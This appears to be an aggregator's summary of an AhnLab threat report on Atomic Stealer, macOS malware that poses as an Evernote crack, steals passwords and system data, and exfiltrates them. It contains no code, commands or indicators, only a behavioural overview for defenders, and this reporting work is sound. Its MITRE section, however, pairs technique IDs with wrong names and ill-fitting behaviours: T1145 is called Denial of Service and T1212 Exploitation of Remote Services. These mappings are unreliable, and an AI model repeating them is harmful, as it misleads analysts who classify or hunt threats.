Threat Research

Atomic Stealer Malware Disguised as Crack Program (macOS)

Ahnlab
Atomic Stealer Malware Disguised as Crack Program (macOS)
EXTRACT IOC
The AhnLab Security Intelligence Center has identified the Atomic Stealer malware, disguised as the Evernote Crack program, that targets macOS users to steal sensitive data. It is distributed via malicious installation files and can bypass security measures. (Affected: macOS, users downloading unofficial software)

Keypoints :

  • Atomic Stealer is information-stealing malware specifically for macOS.
  • It is disguised as the Evernote Crack program.
  • Distributed through installation files like pkg and dmg.
  • Malware distribution checks browser UserAgent to redirect users based on the OS.
  • Features a shell script that bypasses GateKeeper warnings on macOS.
  • Collects sensitive information such as passwords and system data.
  • Can detect if it is running in a virtual environment before executing.
  • Uses a warning message to prompt users for their system password.
  • Collects information into a directory and compresses it into a zip file.
  • Data is sent to the threat actor’s server and then deleted from the victim’s machine.

MITRE Techniques :

  • T1071.001 – Application Layer Protocol: Utilizes HTTP to communicate data to remote servers.
  • T1145 – Denial of Service: Redirects users to malicious websites based on UserAgent checks.
  • T1083 – File and Directory Discovery: Collects system information and scans for files in user directories.
  • T1212 – Exploitation of Remote Services: Bypasses user security warnings to execute malicious scripts.
  • T1070.004 – Indicator Removal on Host: Deletes itself after data exfiltration.

Indicator of Compromise :

  • The article mentions specific MD5 hashes of the malware variants, which can be used to identify the Atomic Stealer executable.
  • It provides URLs that are associated with the malware distribution, which can serve as IOCs for blocking or further investigation.
  • Data exfiltration methods such as the use of POST requests to specific C2 servers can help in identifying compromised systems.
  • Referencing methods like the collection of user passwords can provide insights into potential credential theft indicators.

Full Story: https://asec.ahnlab.com/en/87797/

Views: 31

Tags: COLLECTION, WINDOWS, MACOS, EXFILTRATION, CREDENTIAL, BROWSER, PASSWORD, DISCOVERY